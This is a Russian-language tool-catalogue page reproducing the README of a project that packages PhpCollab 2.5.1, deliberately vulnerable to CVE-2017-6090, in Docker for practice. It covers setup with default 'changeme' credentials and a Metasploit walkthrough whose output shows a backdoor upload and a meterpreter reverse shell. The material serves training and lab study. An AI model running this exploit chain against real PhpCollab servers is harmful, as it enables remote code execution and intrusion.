Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit-CVE-2017-6090 — Containerized exploitable PhpCollab | Kitploit
Инструменты/GitHubGitHub/jlk/exploit-cve-2017-6090
Container SecurityExploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & Education
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

Containerized exploitable PhpCollab

Репозиторий
18 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Контейнеризированная уязвимая CVE-2017-6090

Docker Pulls License

Этот проект создаёт контейнер с PhpCollab 2.5.1, содержащий уязвимость удалённого выполнения кода, описанную в CVE-2017-6090. Кроме того, прилагается файл docker-compose для запуска этого контейнера и mysql для демонстрации. Инструкции по эксплуатации — ниже.

Сборка

docker build -t имя_контейнера . или используйте образ jlkinsel/exploit-cve-2017-6090

Запуск и настройка

Проще всего запустить это с помощью приложенного файла docker-compose.yml. Если в какой-то момент мне станет скучно — или кто-то проявит интерес — я создам развёртывание Kubernetes или helm-чарт.

Итак, чтобы всё запустить:

root@kitploit:~
docker-compose up

Пока всё хорошо! Теперь нужно настроить phpcollab для работы с базой данных и задать пароль администратора по умолчанию. Я (мельком) пытался автоматизировать это, но... ну... вы выглядите как тот, кто умеет пользоваться браузером...

  • Перейдите по адресу http://localhost:8088
  • Прокрутите вниз GPL, установите флажок «Offline installation» («Автономная установка») и нажмите Step 2
  • Введите следующие данные в поля, затем нажмите Save:

В конце вы сможете войти и осмотреться, но для эксплуатации это не обязательно.

Примечание

Обратите внимание: эта docker-композиция ничего особенного не делает для хранения данных. Если вы хотите сохранять базу данных mysql, вам придётся добавить определение тома в определение сервиса mysql в docker-compose.yml. Примеры смотрите на странице mariadb на Docker Hub.

Эксплуатация

Сначала выполните шаги Запуск и настройка выше, чтобы приложение заработало.

Я не добавлял эксплойт в этот проект, потому что, ну, Metasploit.

Новичок в MSF? Вот краткий обзор эксплуатации контейнера, который мы только что запустили:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

Это займёт несколько минут. Страница remnux/metasploit на Docker Hub рассказывает об использовании томов, чтобы в будущем это не занимало столько времени. Но мы здесь и сейчас!

Как только получите приглашение командной строки, продолжаем:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

На этом этапе вы внутри, и веселье начинается.

Примечание

Если имя этой директории отличается от "exploit-CVE-2017-6090", вам придётся изменить команду --network выше.

Также — да, мы устанавливаем удалённый порт 80 в msfconsole, хотя снаружи это 8088. Контейнер metasploit находится в той же сети, что и контейнер phpcollab.

Скачать инструмент
ПолеЗначение
Database servermysql
Database loginphpcollab
Database passwordchangeme
Database namephpcollab
NotificationsFalse
Admin passwordchangeme (или любой другой)